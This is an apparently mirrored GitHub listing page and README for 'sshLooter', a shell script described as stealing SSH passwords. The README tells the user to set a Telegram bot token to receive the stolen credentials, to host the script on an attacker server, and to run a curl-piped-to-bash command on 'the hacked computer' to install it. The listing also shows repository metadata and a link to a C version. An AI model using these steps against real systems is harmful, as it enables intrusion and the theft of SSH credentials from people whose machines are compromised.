https://github.com/mthbernardes/sshLooter
Script to steal passwords from ssh.
https://github.com/mthbernardes/sshLooter
Last synced: 8 months ago
JSON representation
Script to steal passwords from ssh.
- Host: GitHub
- URL: https://github.com/mthbernardes/sshLooter
- Owner: mthbernardes
- Archived: true
- Created: 2018-02-12T17:59:57.000Z (about 8 years ago)
- Default Branch: master
- Last Pushed: 2018-12-19T20:34:52.000Z (over 7 years ago)
- Last Synced: 2025-04-02T06:36:23.212Z (about 1 year ago)
- Language: Shell
- Size: 5.86 KB
- Stars: 478
- Watchers: 29
- Forks: 122
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-csirt - Script to steal passwords from ssh.
README
# DON'T USE THIS
There's a C version which is much better [sshLooterC](https://github.com/mthbernardes/sshLooterC)
# sshLooter
Script to steal passwords from ssh.
# Install
git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter
# Configuration
Edit the script on install.sh, and add your telegram bot api, and your userid.
Call the @botfather on telegram to create a bot and call the @userinfobot to get your user id.
# Usage
On your server execute.
python -m SimpleHTTPServer
On the hacked computer execute.
curl http://yourserverip:8000/install.sh | bash
# Original script from
ChokePoint
# My post about this script
Stealing SSH credentials Another Approach.